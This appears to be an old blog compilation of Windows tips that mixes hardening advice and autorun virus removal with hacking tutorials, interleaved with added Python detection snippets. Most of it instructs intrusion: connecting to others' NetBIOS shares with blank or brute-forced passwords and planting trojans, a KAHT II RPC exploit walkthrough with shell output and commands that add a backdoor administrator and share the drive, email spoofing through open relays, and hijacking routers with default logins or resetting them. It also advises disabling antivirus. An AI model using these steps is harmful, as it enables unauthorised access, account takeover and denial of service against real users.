Flash_Disinfector
Please download Flash_Disinfector.exe (http://www.techsupportforum.com/sectools/sUBs/Flash_Disinfector.exe) by sUBs and save it to your desktop.
Note: Please delete any existing copy of Flash Disinfector on your PC and download this one.
* Double-click Flash_Disinfector.exe to run it.
* Follow any prompts that may appear.
* Your desktop will vanish for a while, and then reappear. This is normal.
* Wait until the program has finished scanning, then please exit the program.
* Restart your computer and see if the problem still persists.
Monday, February 4, 2008
Securing your Windows PC
First, install Win XP with the latest Service Pack. Run Windows Update (START, ALL PROGRAMS, WINDOWS UPDATE) and update Windows and all your device drivers. Download the latest versions of the applications you use, such as an FTP server or proxy; old versions of programs are insecure and you could be hacked that way.
Disable the "guest" account on your PC and rename your "administrator" account. Right click My Computer and choose Manage.
Stop any services you don't use, but be careful not to stop something that you use (RIGHT CLICK MY COMPUTER, CHOOSE MANAGE, SERVICES AND APPLICATIONS, SERVICES). Stop the MESSENGER and REMOTE REGISTRY services.
Delete the admin shares: share each one as something else and then stop sharing it. Then when you reboot it will not be shared automatically again. With these admin shares, domain admins and hackers can access your PC. Make sure to put a complex password on all your accounts.
Make your hard drive NTFS; this is the file system you format your hard drive with. Put a password on your BIOS and change the boot order to boot from the hard drive first, so someone cannot boot up with a CD, delete your SAM file or crack its password, and gain administrator access to your PC.
Make sure the built-in firewall is enabled. Check in Control Panel for Windows Firewall. This firewall may cause some of your hacking applications and tools to stop working, so if you have a problem with an application, make sure to add that program to your Windows Firewall exceptions.
Install some kind of antivirus program; Norton AntiVirus works well. Remember that a lot of hacking tools are picked up by antivirus, so disable your antivirus before running those tools.
Also install a spyware removal tool such as Spyware Doctor.
Spyware is irritating software that is installed onto your PC through files you download from the net or through webpages you open that have malicious code in them. It slows down your PC and might send your information to the spyware creator.
Hacking a PC through NetBios shares
Finding PCs with shares over a LAN or over the Internet is very easy. Choose a certain IP range and use Netscan to search through the IP range for PCs with shares. A PC can only have shares if it is connected to a network or has file and printer sharing enabled, so mostly computers with a network card. If you find a computer with a share, use Windows to connect to that share. Go to START, RUN and type in "\\IP\sharename", for example "\\198.55.67.244\c", or with the PC name, "\\pc1\c". You will then have access to the share, to delete, copy or rename files or directories, depending on what it was shared as, but most people share things with full access and no password. If you find a PC with shares but it asks you for a password when you try to connect to it, the easy way to crack it is with PQWak; this program brute-force cracks the password for you (Win9X only).
Windows NT/XP works through permissions, so if something is shared, it is shared with permissions on the folder, and permissions are given to a user name. But a lot of people make shares with full access for anyone. On Win2K/XP, accessing a share like the C$ share will ask you for a username and password. If no password was specified by the person whose PC it is, try the username Administrator with a blank password. Most people have a blank administrator account password, an easy way to get onto their shares.
On Windows 2000 and XP you can use Venom or Starbrute to brute force or dictionary crack local accounts.
If you gain access to someone's hard drive, copy a trojan server file into their startup folder, and then when they reboot their PC, the trojan will run and you will have access to their PC with the trojan.
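Seen from the machine being protected, the exposure described in this section and in the admin-share advice under "Securing your Windows PC" can be audited from the text output of `net share`. The following is an added example, not part of the original post; the sample output and the function names are constructed for illustration.

```python
import re

# Constructed sample of `net share` output (not captured from a real machine).
SAMPLE_NET_SHARE = r"""
Share name   Resource                        Remark

-------------------------------------------------------------------------------
C$           C:\                             Default share
IPC$                                         Remote IPC
ADMIN$       C:\WINDOWS                      Remote Admin
c            C:\
Docs         C:\Documents and Settings\Bob\My Documents
The command completed successfully.
"""

PATH = re.compile(r"^[A-Za-z]:\\")                     # resource column is a local path
DRIVE_ROOT = re.compile(r"^[A-Za-z]:\\?$")             # a whole drive, e.g. C:\
ADMIN_NAME = re.compile(r"^([A-Za-z]|ADMIN)\$$", re.I)  # C$, D$, ADMIN$

def parse_net_share(output):
    """Return (name, resource, remark) for each row of the share table."""
    rows, in_table = [], False
    for line in output.splitlines():
        if line.startswith("-----"):
            in_table = True            # rows start after the dashed rule
            continue
        if not in_table or not line.strip() or line.startswith("The command"):
            continue
        # Columns are separated by runs of spaces; paths may hold single spaces.
        fields = re.split(r"\s{2,}", line.rstrip())
        name, rest = fields[0], fields[1:]
        # IPC$ has no resource, so only treat the next field as one if it is a path.
        resource = rest.pop(0) if rest and PATH.match(rest[0]) else ""
        remark = rest[0] if rest else ""
        rows.append((name, resource, remark))
    return rows

def audit_shares(output):
    """Flag administrative shares and shares that expose an entire drive."""
    findings = []
    for name, resource, _remark in parse_net_share(output):
        if ADMIN_NAME.match(name):
            findings.append((name, "administrative share"))
        elif DRIVE_ROOT.match(resource):
            findings.append((name, "entire drive shared"))
    return findings

if __name__ == "__main__":
    for name, finding in audit_shares(SAMPLE_NET_SHARE):
        print(f"{name}: {finding}")
```

Share permissions and account passwords are not visible in this output, so a clean result here still leaves the blank-password check to be done separately.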
Hacking a PC with an exploit
What is an exploit? It's a poorly coded piece of software which you can use to gain access to the system. There are many exploits available for the various versions of MS Windows out there. Check this page for new exploits: http://www.frsirt.com/exploits/ or check the Windows Hacker exploit download page, which has compiled exploits.
Now if you're a n00b, you don't know how to compile an exploit. Basically you need some programming experience, so go learn how to program. Most exploits are written in C++, so try Bloodshed Dev C++, which you can use to compile exploits.
Read this tutorial about compiling exploits.
But you can download exploits which other people have already compiled. If someone updates their PC when new exploits come out, you can't exploit them, but if they don't update and install new patches, the chance that you can exploit and gain access to their PC is big.
Check this example of how an exploit works:
KAHT II - MASSIVE RPC EXPLOIT
This is an exploit for Win2k/XP and it's already compiled; you can download it from the Windows Hacker exploits section.
This is an explanation of how to use it:
1. Get target IP, make sure it uses XP or 2k
2. Download exploit tool
(make sure to deactivate your AV)
3. Run exploit from cmd
C:\> kaht 192.168.1.100 192.168.1.101
note: 192.168.1.101 is the target
192.168.1.100 <-- 100 here is target - 1
4. If success, it will display as below
------------------------------------------------------------------------
KAHT II - MASSIVE RPC EXPLOIT
DCOM RPC exploit, Modified by At4r@wdesign.es
#haxorxitos && #localhost @efnet Ownz you!!!
Full VERSION AUTOHACKING
-------------------------------------------------------------------------
Targets : 192.168.1.100-192.168.1.101 eith 50 Threads
Attacking Port. Remote Shell At ports: 36388
Scan in Progress....
- Connecting to 192.168.1.101
Sending Exploit to a [win2k] Server....
- Connectando con la shell REmote...
Microsoft Windows 2000 [VErsion 5.00.2195]
Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
5. NOW.. YOU ARE IN TARGET DRIVE
6. Then you may add user
C:\WINNT\system32>net user myuser mypassword /add
^ ^
user name password
7. Group to admin
C:\WINNT\system32>net localgroup Administrators myuser /add
^ ^ ^
target group group user
8. Sharing drive
C:\WINNT\system32>net share c=c:
9. Exit from target.. dont forget!
C:\WINNT\system32>exit
10. Use share drive, run cmd
C:\>net use * \\192.168.1.101\drive_c * /u:myuser
Type the password for \\192.168.1.101\C: <--- enter myuser's password here
There you will now have a mapped drive to the target PC and an administrator account.
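The steps after the remote shell (a new account, its addition to Administrators, a whole-drive share) leave a recognisable sequence in the Windows Security log. The following is an added detection example, not part of the original post: the records are constructed, the 10-minute window is an assumption, and the event IDs are the current ones (4720, 4732, 5142), whereas Windows 2000/XP logged 624 and 636 for the first two.

```python
import re
from datetime import datetime, timedelta

ADMINS_SID = "S-1-5-32-544"      # well-known SID of the local Administrators group
WINDOW = timedelta(minutes=10)   # assumed correlation window, tune per site

# Constructed sample records (not real logs), already parsed from the
# Security log. 4720 = account created, 4732 = member added to a local
# group, 5142 = network share added.
EVENTS = [
    {"time": "2008-02-04T10:00:05", "host": "PC1", "id": 4720,
     "TargetUserName": "myuser", "TargetSid": "S-1-5-21-1-2-3-1005"},
    {"time": "2008-02-04T10:00:20", "host": "PC1", "id": 4732,
     "MemberSid": "S-1-5-21-1-2-3-1005", "TargetSid": ADMINS_SID},
    {"time": "2008-02-04T10:00:41", "host": "PC1", "id": 5142,
     "ShareName": "\\\\*\\c", "ShareLocalPath": "c:\\"},
    # Benign: a normal account is created and never becomes an administrator.
    {"time": "2008-02-04T11:30:00", "host": "PC2", "id": 4720,
     "TargetUserName": "alice", "TargetSid": "S-1-5-21-9-9-9-1010"},
    # Benign: a folder share on a host that has no alert.
    {"time": "2008-02-04T11:31:00", "host": "PC2", "id": 5142,
     "ShareName": "\\\\*\\Docs", "ShareLocalPath": "C:\\Docs"},
]

def is_drive_root(path):
    """True for paths such as C:\\ or c: that expose a whole drive."""
    return re.fullmatch(r"[A-Za-z]:\\?", path) is not None

def detect(events, window=WINDOW):
    """Alert when a newly created account joins Administrators within
    `window`; attach whole-drive shares created on that host soon after."""
    created, alerts = {}, []
    for e in sorted(events, key=lambda ev: ev["time"]):
        when = datetime.fromisoformat(e["time"])
        if e["id"] == 4720:
            created[(e["host"], e["TargetSid"])] = (when, e["TargetUserName"])
        elif e["id"] == 4732 and e["TargetSid"] == ADMINS_SID:
            # Correlate on the SID: the member must be an account just created.
            born = created.get((e["host"], e["MemberSid"]))
            if born and when - born[0] <= window:
                alerts.append({"host": e["host"], "account": born[1],
                               "promoted_at": when, "drive_shares": []})
        elif e["id"] == 5142 and is_drive_root(e["ShareLocalPath"]):
            for a in alerts:
                if a["host"] == e["host"] and when - a["promoted_at"] <= window:
                    a["drive_shares"].append(e["ShareName"])
    return alerts

if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```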
Anonymous email/email any address
Download RA-Anonymous email first. Then choose who you want to send to and who you want the email to appear to be from. For this to work you will have to find an SMTP server that accepts relaying. So in the server space put in: "smtp.mweb.co.za" - this SMTP server worked at the time I tested it - and you are ready to send someone email from billgates@microsoft.com! Use OPENRELAYCHECKER from my downloads page, which you can use to search for email servers that support relaying. If you're lazy, go to this webpage where you can send anonymous emails: http://www.elitec0ders.net/afteranonimousmail.htm
Accessing Routers
Routers are devices used to route data on a network; a Router decides where certain traffic should be sent. Routers act as a gateway to the Internet and are used by most people these days to access the Internet instead of modems. A client PC can be connected to the Router either through a LAN cable or with a wireless card. Routers are mostly configured through a web-based system or from a command prompt window (cmd).
Most home users with ADSL use Routers as their gateway to the Internet.
Some Routers are configured so that they can only be administered through the web-based system when you are connected to the Router's local network, the internal LAN. To connect to the Router you use your web browser. A typical Router IP address would be 192.168.0.1, so this would be the address to use to connect to the Router through a browser.
If you are using a Router as your Internet gateway, try connecting to it. Remember that the Router's IP address could differ from the example above. If you don't know your Router's IP address, go to the command prompt and type in: ipconfig
Your local area connection gateway address will be your Router's IP address. Remember the Router is your gateway to the Internet.
When you are connected to your Router through the web-based system it will ask you for a username and password. If you know the login details, use them to log into the Router. If you do not know the login details you can try the default login details as set by the Router manufacturer. Have a look at this list with default login details.
In your Router's configuration you can set the settings which the Router uses to connect to the Internet, security settings, local LAN configuration, DHCP settings, port forwarding, statistics and information about the Router status and many more.
Accessing a Router through a command prompt window can be achieved by going to the command prompt (cmd) and typing in:
telnet 192.168.0.1 23
23 is the port on which the Router will be accessed.
You can access someone else's Router over the Internet, log in and change settings or even steal their ISP ( internet service provider ) details. When you Telnet to a Router and it brings up the login screen, it will sometimes show you what make and model the Router is. Then check the default password list and see if you can log in with those default login details and obtain access to the Router. If the person whose Router it is has not changed the Router's default login details, you should be able to access the Router easily. Most home users do not change the default passwords. When you access someone else's Router over the Internet, you can change settings, forward ports, reset the Router or even steal their ISP ( internet service provider ) details.
Telnetting to a Marconi ADSL Router with the CX82310 chip from Conexant on port 23 will give the following output:
01/01/99 CONEXANT SYSTEMS, INC. 00:04:10
ATU-R ACCESS RUNNER ADSL TERMINAL (Annex A) 3.21
LOGIN PASSWORD>
And logging into the Router will bring up the main menu:
01/04/99 CONEXANT SYSTEMS, INC. 02:00:45
ATU-R ACCESS RUNNER ADSL TERMINAL (Annex A) 3.29
MAIN MENU
1. SYSTEM STATUS AND CONFIGURATION
2. ADSL MENU
4. REMOTE LOGON
Q. LOGOUT
ENTER CHOICE-->
This specific Marconi Router has a vulnerability: if you Telnet to the Router on port 254 ( as shown above ) and the enter key is pressed ( blank login password ), you will gain access to the Router. In this menu you will be able to remotely reset to factory settings, allowing a permanent denial of service attack until reconfigured manually.
Another vulnerability of this Marconi Router is that when you connect to the Router with the web-based GUI ( graphical user interface ) you will be able to see the ISP password when viewing the webpage source: /System.sht
autorun.inf virus removal
Removing the ntde1ect.com and autorun.inf files
September 10th, 2007 at 6:01 am (Tips, Windows)
There is a trojan/virus (either the Win32/Pacex virus or the Win32/PSW.Agent.NDP trojan) that uses those two files. Here is how you can get rid of them:
1) Open up Task Manager (Ctrl-Alt-Del)
2) If wscript.exe is running, end it.
3) If explorer.exe is running, end it.
4) Open up “File | New Task (Run)” in the Task manager
5) Run cmd
6) Run the following command on all your drives by replacing c:\ with other drives in turn (note: if you have autorun.inf files that you think you need to back up, do so now):
del c:\autorun.* /f /a /s /q
7) Go to your Windows\System32 directory by typing cd c:\windows\system32
8) Type dir /a avp*.*
9) If you see any files named avp0.dll or avpo.exe or avp0.exe, use the following commands to delete each of them:
attrib -r -s -h avpo.exe
del avpo.exe
10) Use the Task Manager’s Run command to fire up regedit
11) Navigate to HKEY_CURRENT_USER \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run (as usual, take a backup of your registry before touching it!)
12) If there are any entries for avpo.exe, delete them.
13) Do a complete search of your registry for ntde1ect.com and delete any entries you find.
14) Restart your computer.
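Step 6 deletes every autorun.* file without looking at it; reading the file first shows what it would have launched, which also tells you which executable to look for on the drive. The following is an added example, not part of the original post: the sample autorun.inf is constructed, and `KNOWN_BAD` holds only the file names mentioned in the steps above.

```python
import os
import re

# File names the removal steps above associate with this infection.
KNOWN_BAD = {"ntde1ect.com", "avpo.exe", "avp0.exe", "avp0.dll"}
# autorun.inf keys that make Windows run a program from the drive.
EXEC_KEY = re.compile(r"^(open|shellexecute|shell\\[^\\]+\\command)$", re.I)

# Constructed sample of an infected autorun.inf (not taken from a real drive).
SAMPLE_AUTORUN = r"""
;x9k2 padding line
[AutoRun]
open=ntde1ect.com
shell\open\Command=ntde1ect.com
shell\explore\Command=ntde1ect.com
icon=folder.ico
"""

def autorun_targets(text):
    """Return [(key, command)] for [autorun] entries that launch a program."""
    found, in_section = [], False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue                      # blank lines and comment padding
        if line.startswith("["):
            in_section = line.lower() == "[autorun]"
            continue
        if in_section and "=" in line:
            key, value = (part.strip() for part in line.split("=", 1))
            if value and EXEC_KEY.match(key):
                found.append((key.lower(), value))
    return found

def scan_root(root):
    """Report what autorun.inf in `root` (a drive root) would execute."""
    report = []
    for name in os.listdir(root):
        if name.lower() != "autorun.inf":
            continue
        with open(os.path.join(root, name), "rb") as fh:
            data = fh.read()
        # UTF-16 files carry a BOM; latin-1 decodes any other byte sequence.
        bom = data[:2] in (b"\xff\xfe", b"\xfe\xff")
        text = data.decode("utf-16" if bom else "latin-1")
        for key, command in autorun_targets(text):
            # First token of the command, with Windows separators normalised.
            parts = command.split()[0].strip('"').replace("\\", "/").split("/")
            report.append({
                "key": key,
                "command": command,
                "target_present": os.path.exists(os.path.join(root, *parts)),
                "known_bad": parts[-1].lower() in KNOWN_BAD,
            })
    return report

if __name__ == "__main__":
    for key, command in autorun_targets(SAMPLE_AUTORUN):
        print(key, "->", command)
```

Call `scan_root` on each drive root in turn before running the delete in step 6; an entry with `target_present` set names a file that is still on that drive.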